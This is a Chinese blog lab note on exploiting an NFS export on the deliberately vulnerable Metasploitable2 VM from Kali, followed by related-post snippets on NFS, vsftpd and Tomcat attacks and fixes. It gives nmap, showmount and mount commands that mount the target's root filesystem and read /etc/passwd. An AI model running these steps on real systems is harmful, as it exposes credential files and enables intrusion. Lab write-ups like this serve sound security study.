kali linux对Metasploitable2漏洞利用,nfs获取目标密码文件 笔记

最新推荐文章于 2024-05-11 12:11:25 发布
最新推荐文章于 2024-05-11 12:11:25 发布
阅读量973 收藏 5
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_30508729/article/details/101039482
版权

NFS(Network File System)即网络文件系统,是FreeBSD支持的文件系统中的一种,它允许网络中的计算机之间通过TCP/IP网络共享资源。在NFS的应用中,本地NFS的客户端应用可以透明地读写位于远端NFS服务器上的文件,就像访问本地文件一样。

实验环境:

攻击机:kali linux 
ip:192.168.172.134
目标机:Metasploittable2
ip:192.168.172.129

攻击过程:

step1:nmap 扫描

nmap 192.168.172.129

step2:进一步探测

nmap -sV -p 2049 192.168.172.129

step3:使用脚本探测

nmap --script=nfs-* 192.168.172.129

返回漏洞信息

step4:利用nfs导出主机信息

用到的工具:使用showmount命令确定“/”共享(文件系统的根)是否正在导出。可能需要安装nfs-common包才能使用“showmount”命令 apt-get install nfs-common showmount -e IP

目前已经集成在kali 中

showmount -e 192.168.172.129           //探测nfs是否可以导出

step5:查看导出内容

mkdir nfs_root                 //新建一个文件夹

mount -t nfs 192.168.172.129:/ ~/nfs_root -o nolock              //挂载目标

cat ~/nfs_root/etc/passwd          //查看目标密码

02be55f
关注
利用nfs共享漏洞获取系统文件
shatianyzg的博客
06-06 300
环境:win7攻击机 192.168.241.131 Centos 7 靶机 192.168.241.128配置靶机的ip地址 Vim /etc/exports[root@localhost nfs]# chmod -R 777 /nfs 关闭firewall及selinux root@localhost nfs]# systemctl stop firewalld [root@localhost nfs]# systemctl disable firewalldVim /etc/selinux/conf
nfs漏洞分析
qq_57147160的博客
12-13 1423
首先nfs是一个文件共享的一个服务,然后来进行搭建一下,首先启动起来: 这样服务已将开启了,但是还没有共享的目录文件,我们需要再/etc/exports中来进行配置; 写上这一句话,*号的意思是所以ip都可以进行访问,rw就是可以写入的意思。 随后我们使用nmap进行扫描: 就可以看到nfs服务了。 我们使用showmount命令来进行查看可以访问的路径: 就可以可能到我们可以访问根目录。 随后我们使用命令mount来挂载一个镜像: 挂载完成后,我们进入/mnt目录就可以
nfs文件共享漏洞
m0_52433710的博客
12-21 6452
什么是nfs NFS是基于UDP/IP协议的应用,其实现主要是采用远程过程调用RPC机制,RPC提供了一组与机器、操作系统以及低层传送协议无关的存取远程文件的操作。RPC采用了XDR的支持。XDR是一种与机器无关的数据描述编码的协议,他以独立与任意机器体系结构的格式对网上传送的数据进行编码和解码,支持在异构系统之间数据的传送。 漏洞复现 攻击机:Kali 靶机:Metasploitable2 首先利用nmap对靶机 进行扫描,扫描其开放的端口: ...
6-19漏洞利用-nfs获取目标密码文件
山兔的博客
07-26 1367
NFS(NetworkFileSystem)即网络文件系统,是FreeBSD支持的文件系统中的一种,它允许网络中的计算机之间通过TCP/IP网络共享资源。在NFS的应用中,本地NFS的客户端应用可以透过TCP/IP通道透明地读写位于远端NFS服务器上的文件,就像访问本地文件一样。它和smb效果类似,但是它的协议是不同的,我们可以通过nmap探测目标IP地址,查看是否开启了NFS服务,nfs一般是2049端口探测它的具体信息,运行TCP端口,nfs服务,以及版本。......
ubuntu配置一个简易的NFS服务
游不快的老孙
09-19 269
安装 NFS 服务端 sudo apt install nfs-kernel-server 配置portmap vim /etc/default/portmap 添加 -i 127.0.0.1 配置/etc/exports 添加 /home/sjm/NFSshare *(rw,sync,no_root_squash) /home :共享的目录 * 所有...
Linux NFS共享目录配置漏洞
m0_62670778的博客
05-11 855
使用nmap扫描靶机的IP地址,可以看到靶机的2049端口开放,且使用了nfs服务。尝试查看靶机利用NFS共享的全部文件夹:看到结果是。接下来可以利用nfs漏洞实现远程ssh无密码登录。传输成功之后再次尝试使用ssh命令连接靶机。这表示将根目录下单全部文件都共享了。,其目的就是映射共享文件夹下的根目录。将靶机上的共享文件挂载到该文件上面。在攻击机上面创建一个根文件夹。命令查看所有的本地磁盘的信息。我们尝试用ssh服务连接上靶机。在挂载成功之后我们可以通过。
kali linuxMetasploitable2漏洞利用,tomcat管理用户爆力破解/利用tomcat upload 功能反弹shel笔记
边城浪子的博客
09-20 775
Tomcat 服务器是一个免费的开放源代码的Web 应用服务器,属于轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP 程序的首选。默认情况下,8180端口是tomcat管理的HTTP端口 实验环境: 攻击机:kali linux ip:192.168.172.134 目标机:Metasploittable2 ip:192.168.172.129 攻...
kali Linux系统的漏洞利用
最新发布
06-19
### Kali Linux系统的漏洞利用 #### 一、Metasploitable操作系统 Metasploitable是一款专为安全测试和渗透测试设计的操作系统,基于Ubuntu Linux。它预装了一系列易受攻击的服务和应用程序,使得安全专家可以方便...
kali linux攻击靶机Metasploitable2实验------vsFTPd手工触发漏洞
边城浪子的博客
07-27 1275
漏洞:vsftpd手工出发漏洞:当进行FTP认证时,如果用户名USER中包含:),那么直接就触发监听6200端口的连接的shell。 靶机:Metasploitable2 step1:开启kali linuxMetasploitable2 step2:扫描漏洞 命令:nmap --script vuln 目标ip nmap --script vuln -p 21192.168.5...
安全课堂kali linux笔记1~100课.zip
07-27
Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni...目前Kali Linux的最新版本为2019.2,增加了对RTL8812AU网卡的支持
Kali Linux渗透测试技术详解
02-19
介绍了Linux安全透简介、安装及配置KaliLinux 操作系统、配置目标测试系统:第2篇为信息的收集及利用,介绍了信息收集、漏洞扫描、漏洞利用等技术:第3篇为各种渗透测试,介绍了权限提升、密码攻击、无线网络攻击、...
4.8、漏洞利用-NSF配置漏洞与Rpcbind信息泄露
c10udz的博客
10-29 5804
NFS(network file system):网络文件系统。Linux下三大文件系统之一,采用C/S架构。允许网络中的计算机之间通过TCP/IP网络共享资源。在NFS应用中,本地NFS客户端可以透明的读写位于远端NFS服务器上的文件NFS服务端机器:通过NFS协议将文件共享到网络上NFS客户端机器:通过网络挂载NFS共享目录到本地补充:NFS服务器主要进程1 rpc.nfsd 进程NFS 服务的主进程,主要管理客户端是否能够接入 NFS 服务器以及数据的传输。
nfs漏洞的处理:目标主机showmount -e信息泄露(CVE-1999-0554)
大新新大浩浩的博客
09-14 1835
nfs漏洞的处理:目标主机showmount -e信息泄露(CVE-1999-0554)
NFS不安全的配置漏洞
weixin_46564680的博客
10-13 2285
NFS不安全的配置漏洞 NFS简述: 网络文件系统(英语:Network File System,缩写作 NFS)是一种分布式文件系统,力求客户端主机可以访问服务器端文件,并且其过程与访问本地存储时一样,允许网络上的用户以类似于本地存储的方式访问共享文件夹。 NFS服务的默认开放端口为2049/TCP。 漏洞检测: NFS不安全配置漏洞检测可以通过漏洞扫描工具发现 Nessus漏洞报告详情 使用NMAP检测漏洞 使用NMAP扫描发现目标开放2049端口 查看nmap自带的和NFS相关的
【漏洞验证】NFS 共享信息泄露漏洞
热门推荐
weixin_43486390的博客
01-15 1万+
文章目录描述验证 描述 漏洞名称:NFS Exported Share Information Disclosure 中文名称:NFS 共享信息泄露漏洞 漏洞等级:高危 CVE:CVE-1999-0170 Nessus扫描结果: 输出共享目录和文件信息: 验证 步骤1:msf 验证漏洞是否存在,并输出共享目录 use auxiliary/scanner/nfs/nfsmount set rho...
CVE-2022-26937 Windows NFS 栈溢出漏洞分析
顶峰
01-31 624
运维
Metasploitable2 - tcp port 2049 - NFS
Nixawk
07-31 1720
nfs 2049/tcp #Network File System - Sun Microsystems shilp 2049/tcp # nfs 2049/udp #Network File System - Sun Microsystems shilp 2049/udp # nfs --
漏洞修复:NFS如何限制可以获取NFS输出列表的IP和用户
weixin_54626591的博客
03-25 2202
NFS如何限制可以获取NFS输出列表的IP和用户
华为欧拉2204NFS系统漏洞修复
u011197085的博客
03-13 706
从你提供的文件内容来看,当前的NFS共享配置允许整个子网内的任何主机以读写(rw)模式挂载/data/data目录。rwsyncall_squash这样的配置为你的网络内的任何主机提供了相当宽松的访问权限,可能不是特别安全,特别是如果你只想让特定的几台服务器有权限访问此NFS共享。如果你希望仅限制特定的几台服务器(如你之前提到的四台服务器:192.168.112.21、192.168.112.22、192.168.112.23、192.168.112.24)访问/data/data,你需要将。
利用Beef获取目标主机用户名与密码:实战教程
本资源主要介绍如何在合法研究和测试环境下,通过beef(Browser Exploitation Framework)这一专业的浏览器漏洞利用框架来获取目标主机的用户名和密码,以及利用它进一步获取shell权限。beef结合Metasploit工具,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值